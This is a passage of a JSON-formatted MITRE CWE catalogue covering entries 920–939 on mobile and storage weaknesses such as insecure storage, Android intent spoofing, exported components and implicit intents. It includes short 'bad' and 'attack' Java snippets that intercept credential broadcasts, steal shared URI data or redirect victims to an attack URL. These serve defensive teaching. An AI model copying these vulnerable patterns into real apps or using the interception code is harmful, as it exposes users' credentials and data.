References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated References, Related_Attack_Patterns, Relationships"}]}},"920":{"attr":{"@_ID":"920","@_Name":"Improper Restriction of Power Consumption","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software operates in an environment in which power is a limited resource that cannot be automatically replenished, but the software does not properly restrict the amount of power that its operation consumes.","Extended_Description":{"xhtml:p":["In environments such as embedded or mobile devices, power can be a limited resource such as a battery, which cannot be automatically replenished by the software itself, and the device might not always be directly attached to a reliable power source. If the software uses too much power too quickly, then this could cause the device (and subsequently, the software) to stop functioning until power is restored, or increase the financial burden on the device owner because of increased power costs.","Normal operation of an application will consume power. However, in some cases, an attacker could cause the application to consume more power than intended, using components such as:"],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Display","CPU","Disk I/O","GPS","Sound","Microphone","USB interface"]}}},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"400","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"400","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Mobile","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design"}},"Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":["DoS: Resource Consumption (Other)","DoS: Crash, Exit, or Restart"],"Note":"The power source could be drained, causing the application - and the entire device - to cease functioning."}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2013-06-11"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Relationships"}]}},"921":{"attr":{"@_ID":"921","@_Name":"Storage of Sensitive Data in a Mechanism without Access Control","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software stores sensitive information in a file system or device that does not have built-in access control.","Extended_Description":{"xhtml:p":["While many modern file systems or devices utilize some form of access control in order to restrict access to data, not all storage mechanisms have this capability. For example, memory cards, floppy disks, CDs, and USB devices are typically made accessible to any user within the system. This can become a problem when sensitive data is stored in these mechanisms in a multi-user environment, because anybody on the system can read or write this data.","On Android devices, external storage is typically globally readable and writable by other applications on the device. External storage may also be easily accessible through the mobile device\'s USB connection or physically accessible through the device\'s memory card port."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"922","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Mobile","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."}},"Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":["Read Application Data","Read Files or Directories"],"Note":"Attackers can read sensitive information by accessing the unrestricted storage mechanism."},{"Scope":"Integrity","Impact":["Modify Application Data","Modify Files or Directories"],"Note":"Attackers can modify or delete sensitive information by accessing the unrestricted storage mechanism."}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-921"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2013-06-22"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Relationships"}]}},"922":{"attr":{"@_ID":"922","@_Name":"Insecure Storage of Sensitive Information","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software stores sensitive information without properly limiting read or write access by unauthorized actors.","Extended_Description":"If read access is not properly restricted, then attackers can steal the sensitive information. If write access is not properly restricted, then attackers can modify and possibly delete the data, causing incorrect results and possibly a denial of service.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"664","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."},{"Phase":"Implementation"},{"Phase":"System Configuration"}]},"Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":["Read Application Data","Read Files or Directories"],"Note":"Attackers can read sensitive information by accessing the unrestricted storage mechanism."},{"Scope":"Integrity","Impact":["Modify Application Data","Modify Files or Directories"],"Note":"Attackers can read sensitive information by accessing the unrestricted storage mechanism."}]},"Notes":{"Note":[{"#text":"There is an overlapping relationship between insecure storage of sensitive information (CWE-922) and missing encryption of sensitive information (CWE-311). Encryption is often used to prevent an attacker from reading the sensitive data. However, encryption does not prevent the attacker from erasing or overwriting the data.","attr":{"@_Type":"Relationship"}},{"#text":"This is a high-level entry that includes children from various parts of the CWE research view (CWE-1000). Currently, most of the information is in these child entries. This entry will be made more comprehensive in later CWE versions.","attr":{"@_Type":"Maintenance"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2013-06-23"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Maintenance_Notes"}]}},"923":{"attr":{"@_ID":"923","@_Name":"Improper Restriction of Communication Channel to Intended Endpoints","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software establishes a communication channel to (or from) an endpoint for privileged or protected operations, but it does not properly ensure that it is communicating with the correct endpoint.","Extended_Description":{"xhtml:p":["Attackers might be able to spoof the intended endpoint from a different system or process, thus gaining the same level of access as the intended endpoint.","While this issue frequently involves authentication between network-based clients and servers, other types of communication channels and endpoints can have this weakness."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Confidentiality"],"Impact":"Gain Privileges or Assume Identity","Note":"If an attacker can spoof the endpoint, the attacker gains all the privileges that were intended for the original endpoint."}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"501"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2013-06-23"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Description, Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Maintenance_Notes"}],"Previous_Entry_Name":{"#text":"Improper Authentication of Endpoint in a Communication Channel","attr":{"@_Date":"2014-02-18"}}}},"924":{"attr":{"@_ID":"924","@_Name":"Improper Enforcement of Message Integrity During Transmission in a Communication Channel","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software establishes a communication channel with an endpoint and receives a message from that endpoint, but it does not sufficiently ensure that the message was not modified during transmission.","Extended_Description":"Attackers might be able to modify the message and spoof the endpoint by interfering with the data as it crosses the network or by redirecting the connection to a system under their control.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"345","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"345","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Confidentiality"],"Impact":"Gain Privileges or Assume Identity","Note":"If an attackers can spoof the endpoint, the attacker gains all the privileges that were intended for the original endpoint."}},"Notes":{"Note":{"#text":"This entry should be made more comprehensive in later CWE versions, as it is likely an important design flaw that underlies (or chains to) other weaknesses.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2013-06-23"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Maintenance_Notes"}]}},"925":{"attr":{"@_ID":"925","@_Name":"Improper Verification of Intent by Broadcast Receiver","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The Android application uses a Broadcast Receiver that receives an Intent but does not properly verify that the Intent came from an authorized source.","Extended_Description":"Certain types of Intents, identified by action string, can only be broadcast by the operating system itself, not by third-party applications. However, when an application registers to receive these implicit system intents, it is also registered to receive any explicit intents. While a malicious application cannot send an implicit system intent, it can send an explicit intent to the target application, which may assume that any received intent is a valid implicit system intent and not an explicit intent from another application. This may lead to unintended behavior.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"923","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Mobile","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":{"Term":"Intent Spoofing"}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Gain Privileges or Assume Identity","Note":"Another application can impersonate the operating system and cause the software to perform an unintended action."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"Before acting on the Intent, check the Intent Action to make sure it matches the expected System action."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following example demonstrates the weakness.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"XML"},"xhtml:div":{"#text":"<manifest package=\\"com.example.vulnerableApplication\\"></manifest>","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"<application></application>","xhtml:br":["","","","",""],"xhtml:i":["...","..."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"<receiver android:name=\\".ShutdownReceiver\\"></receiver>","xhtml:div":{"#text":"<intent-filter></intent-filter>","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"<action android:name=\\"android.intent.action.ACTION_SHUTDOWN\\" />","attr":{"@_style":"margin-left:10px;"}}}}}}}}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"IntentFilter filter = new IntentFilter(Intent.ACTION_SHUTDOWN);BroadcastReceiver sReceiver = new ShutDownReceiver();registerReceiver(sReceiver, filter);public class ShutdownReceiver extends BroadcastReceiver {}","xhtml:br":["","","","","","",""],"xhtml:i":["...","..."],"xhtml:div":{"#text":"@Overridepublic void onReceive(final Context context, final Intent intent) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":"","xhtml:div":{"#text":"mainActivity.saveLocalData();mainActivity.stopActivity();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}}},{"attr":{"@_Nature":"attack","@_Language":"Java"},"xhtml:div":"window.location = examplescheme://method?parameter=value"}],"Body_Text":["The ShutdownReceiver class will handle the intent:","Because the method does not confirm that the intent action is the expected system intent, any received intent will trigger the shutdown procedure, as shown here:","An attacker can use this behavior to cause a denial of service."]}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"499"}}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-922","@_Section":"3.2.1"}}},"Notes":{"Note":{"#text":"This entry will be made more comprehensive in later CWE versions.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2013-06-24"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Alternate_Terms, Demonstrative_Examples, Description, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Relationships"}]}},"926":{"attr":{"@_ID":"926","@_Name":"Improper Export of Android Application Components","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The Android application exports a component for use by other applications, but does not properly restrict which applications can launch the component or access the data it contains.","Extended_Description":{"xhtml:p":"The attacks and consequences of improperly exporting a component may depend on the exported component:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["If access to an exported Activity is not restricted, any application will be able to launch the activity. This may allow a malicious application to gain access to sensitive information, modify the internal state of the application, or trick a user into interacting with the victim application while believing they are still interacting with the malicious application.","If access to an exported Service is not restricted, any application may start and bind to the Service. Depending on the exposed functionality, this may allow a malicious application to perform unauthorized actions, gain access to sensitive information, or corrupt the internal state of the application.","If access to a Content Provider is not restricted to only the expected applications, then malicious applications might be able to access the sensitive data. Note that in Android before 4.2, the Content Provider is automatically exported unless it has been explicitly declared as NOT exported."]}}},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"285","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Mobile","@_Prevalence":"Undetermined"}}},"Background_Details":{"Background_Detail":{"xhtml:p":["There are three types of components that can be exported in an Android application.","An Activity is an application component that provides a UI for users to interact with. A typical application will have multiple Activity screens that perform different functions, such as a main Activity screen and a separate settings Activity screen.","A Service is an application component that is started by another component to execute an operation in the background, even after the invoking component is terminated. Services do not have a UI component visible to the user.","The Content Provider mechanism can be used to share data with other applications or internally within the same application."],"xhtml:div":[{"#text":"Activity","attr":{"@_style":"color:#32498D; font-weight:bold;"}},{"#text":"Service","attr":{"@_style":"color:#32498D; font-weight:bold;"}},{"#text":"Content Provider","attr":{"@_style":"color:#32498D; font-weight:bold;"}}]}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design"}},"Common_Consequences":{"Consequence":[{"Scope":["Availability","Integrity"],"Impact":["Unexpected State","DoS: Crash, Exit, or Restart","DoS: Instability","Varies by Context"],"Note":"Other applications, possibly untrusted, can launch the Activity."},{"Scope":["Availability","Integrity"],"Impact":["Unexpected State","Gain Privileges or Assume Identity","DoS: Crash, Exit, or Restart","DoS: Instability","Varies by Context"],"Note":"Other applications, possibly untrusted, can bind to the Service."},{"Scope":["Confidentiality","Integrity"],"Impact":["Read Application Data","Modify Application Data"],"Note":"Other applications, possibly untrusted, can read or modify the data that is offered by the Content Provider."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Build and Compilation","Strategy":"Attack Surface Reduction","Description":"If they do not need to be shared by other applications, explicitly mark components with android:exported=\\"false\\" in the application manifest."},{"Phase":"Build and Compilation","Strategy":"Attack Surface Reduction","Description":"If you only intend to use exported components between related apps under your control, use android:protectionLevel=\\"signature\\" in the xml manifest to restrict access to applications signed by you."},{"Phase":["Build and Compilation","Architecture and Design"],"Strategy":"Attack Surface Reduction","Description":"Limit Content Provider permissions (read/write) as appropriate."},{"Phase":["Build and Compilation","Architecture and Design"],"Strategy":"Separation of Privilege","Description":"Limit Content Provider permissions (read/write) as appropriate."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"This application is exporting an activity and a service in its manifest.xml:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"XML"},"xhtml:div":{"#text":"<activity android:name=\\"com.example.vulnerableApp.mainScreen\\"></activity><service android:name=\\"com.example.vulnerableApp.backgroundService\\"></service>","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"<intent-filter></intent-filter>","xhtml:br":["","","",""],"xhtml:i":["...","..."],"xhtml:div":{"#text":"<action android:name=\\"com.example.vulnerableApp.OPEN_UI\\" /><category android:name=\\"android.intent.category.DEFAULT\\" />","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"<intent-filter></intent-filter>","xhtml:br":["","","",""],"xhtml:i":["...","..."],"xhtml:div":{"#text":"<action android:name=\\"com.example.vulnerableApp.START_BACKGROUND\\" />","attr":{"@_style":"margin-left:10px;"}}}}],"xhtml:br":""}},"Body_Text":"Because these components have intent filters but have not explicitly set \'android:exported=false\' elsewhere in the manifest, they are automatically exported so that any other application can launch them. This may lead to unintended behavior or exploits."},{"Intro_Text":"This application has created a content provider to enable custom search suggestions within the application:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"XML"},"xhtml:div":{"#text":"<provider></provider>","xhtml:div":{"#text":"android:name=\\"com.example.vulnerableApp.searchDB\\"android:authorities=\\"com.example.vulnerableApp.searchDB\\">","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}},"Body_Text":"Because this content provider is only intended to be used within the application, it does not need to be exported. However, in Android before 4.2, it is automatically exported thus potentially allowing malicious applications to access sensitive information."}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-923"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2013-07-02"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-01-22","Modification_Importance":"Critical","Modification_Comment":"Expanded entry to be more general and include all types of Android components that may be improperly exported."},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Background_Details, Common_Consequences, Demonstrative_Examples, Description, Maintenance_Notes, Name, Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Relationships"}],"Previous_Entry_Name":{"#text":"Improper Restriction of Content Provider Export to Other Applications","attr":{"@_Date":"2014-02-18"}}}},"927":{"attr":{"@_ID":"927","@_Name":"Use of Implicit Intent for Sensitive Communication","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The Android application uses an implicit intent for transmitting sensitive data to other applications.","Extended_Description":{"xhtml:p":["Since an implicit intent does not specify a particular application to receive the data, any application can process the intent by using an Intent Filter for that intent. This can allow untrusted applications to obtain sensitive data. There are two variations on the standard broadcast intent, ordered and sticky.","Ordered broadcast intents are delivered to a series of registered receivers in order of priority as declared by the Receivers. A malicious receiver can give itself a high priority and cause a denial of service by stopping the broadcast from propagating further down the chain. There is also the possibility of malicious data modification, as a receiver may also alter the data within the Intent before passing it on to the next receiver. The downstream components have no way of asserting that the data has not been altered earlier in the chain.","Sticky broadcast intents remain accessible after the initial broadcast. An old sticky intent will be broadcast again to any new receivers that register for it in the future, greatly increasing the chances of information exposure over time. Also, sticky broadcasts cannot be protected by permissions that may apply to other kinds of intents.","In addition, any broadcast intent may include a URI that references data that the receiving component does not normally have the privileges to access. The sender of the intent can include special privileges that grant the receiver read or write access to the specific URI included in the intent. A malicious receiver that intercepts this intent will also gain those privileges and be able to read or write the resource at the specified URI."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"285","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"668","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Mobile","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design"}},"Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"Other applications, possibly untrusted, can read the data that is offered through the Intent."},{"Scope":"Integrity","Impact":"Varies by Context","Note":"The application may handle responses from untrusted applications on the device, which could cause it to perform unexpected or unauthorized actions."}]},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"If the application only requires communication with its own components, then the destination is always known, and an explicit intent could be used."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"This application wants to create a user account in several trusted applications using one broadcast intent:","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"Intent intent = new Intent();intent.setAction(\\"com.example.CreateUser\\");intent.putExtra(\\"Username\\", uname_string);intent.putExtra(\\"Password\\", pw_string);sendBroadcast(intent);","xhtml:br":["","","",""]}},{"attr":{"@_Nature":"attack","@_Language":"Java"},"xhtml:div":{"#text":"IntentFilter filter = new IntentFilter(\\"com.example.CreateUser\\");MyReceiver receiver = new MyReceiver();registerReceiver(receiver, filter);","xhtml:br":["",""]}}],"Body_Text":["This application assumes only the trusted applications will be listening for the action. A malicious application can register for this action and intercept the user\'s login information, as below:","When a broadcast contains sensitive information, create an allowlist of applications that can receive the action using the application\'s manifest file, or programmatically send the intent to each individual intended receiver."]},{"Intro_Text":"This application interfaces with a web service that requires a separate user login. It creates a sticky intent, so that future trusted applications that also use the web service will know who the current user is:","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"Intent intent = new Intent();intent.setAction(\\"com.example.service.UserExists\\");intent.putExtra(\\"Username\\", uname_string);sendStickyBroadcast(intent);","xhtml:br":["","",""]}},{"attr":{"@_Nature":"attack","@_Language":"Java"},"xhtml:div":{"#text":"IntentFilter filter = new IntentFilter(\\"com.example.service.UserExists\\");MyReceiver receiver = new MyReceiver();registerReceiver(receiver, filter);","xhtml:br":["",""]}}],"Body_Text":"Sticky broadcasts can be read by any application at any time, and so should never contain sensitive information such as a username."},{"Intro_Text":"This application is sending an ordered broadcast, asking other applications to open a URL:","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"Intent intent = new Intent();intent.setAction(\\"com.example.OpenURL\\");intent.putExtra(\\"URL_TO_OPEN\\", url_string);sendOrderedBroadcastAsUser(intent);","xhtml:br":["","",""]}},{"attr":{"@_Nature":"attack","@_Language":"Java"},"xhtml:div":{"#text":"public class CallReceiver extends BroadcastReceiver {}","xhtml:div":{"#text":"@Overridepublic void onReceive(Context context, Intent intent) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":"","xhtml:div":{"#text":"String Url = intent.getStringExtra(Intent.URL_TO_OPEN);attackURL = \\"www.example.com/attack?\\" + Url;setResultData(attackURL);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}}}],"Body_Text":["Any application in the broadcast chain may alter the data within the intent. This malicious application is altering the URL to point to an attack site:","The final receiving application will then open the attack URL. Where possible, send intents to specific trusted applications instead of using a broadcast chain."]},{"attr":{"@_Demonstrative_Example_ID":"DX-108"},"Intro_Text":"This application sends a special intent with a flag that allows the receiving application to read a data file for backup purposes.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"Intent intent = new Intent();intent.setAction(\\"com.example.BackupUserData\\");intent.setData(file_uri);intent.addFlags(FLAG_GRANT_READ_URI_PERMISSION);sendBroadcast(intent);","xhtml:br":["","","",""]}},{"attr":{"@_Nature":"attack","@_Language":"Java"},"xhtml:div":{"#text":"public class CallReceiver extends BroadcastReceiver {}","xhtml:div":{"#text":"@Overridepublic void onReceive(Context context, Intent intent) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":"","xhtml:div":{"#text":"Uri userData = intent.getData();stealUserData(userData);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}}}],"Body_Text":"Any malicious application can register to receive this intent. Because of the FLAG_GRANT_READ_URI_PERMISSION included with the intent, the malicious receiver code can read the user\'s data."}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-922","@_Section":"3.2.1"}},{"attr":{"@_External_Reference_ID":"REF-923"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2013-07-09"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Demonstrative_Examples, Description, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Maintenance_Notes"}]}},"939":{"attr":{"@_ID":"939","@_Name":"Improper Authorization in Handler for Custom URL Scheme","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses a handler for a custom URL scheme, but it does not properly restrict which actors can invoke the handler using the scheme.","Extended_Description":"Mobile platforms and other architectures allow the use of custom URL schemes to facilitate communication between applications. In the case of iOS, this is the only method to do inter-application communication. The implementation is at the developer\'s discretion which may open security flaws in the application. An example could be potentially dangerous functionality such as modifying files through a custom URL scheme.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"862","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Technology":{"attr":{"@_Class":"Mobile","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":{"xhtml:p":["Utilize a user prompt pop-up to authorize potentially harmful actions such as those modifying data or dealing with sensitive information.","When designing functionality of actions in the URL scheme, consider whether the action should be accessible to all mobile applications, or if an allowlist of applications to interface with is appropriate."]}}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"This iOS application uses a custom URL scheme. The replaceFileText action in the URL scheme allows an external application to interface with the file incomingMessage.txt and replace the contents with the text field of the query string.","Body_Text":["External Application","Application URL Handler","The handler has no restriction on who can use its functionality. The handler can be invoked using any method that invokes the URL handler such as the following malicious iframe embedded on a web page opened by Safari.","The attacker can host a malicious website containing the iframe and trick users into going to the site via a crafted phishing email. Since Safari automatically executes iframes, the user is not prompted when the handler executes the iframe code which automatically invokes the URL handler replacing the bookmarks file with a list of malicious websites. Since replaceFileText is a potentially dangerous action, an action that modifies data, there should be a sanity check before the writeToFile:withText: function."],"Example_Code":[{"attr":{"@_Nature":"good","@_Language":"Objective-C"},"xhtml:div":{"#text":"NSString *stringURL = @\\"appscheme://replaceFileText?file=incomingMessage.txt&text=hello\\";NSURL *url = [NSURL URLWithString:stringURL];[[UIApplication sharedApplication] openURL:url];","xhtml:br":["",""]}},{"attr":{"@_Nature":"bad"},"xhtml:div":{"#text":"- 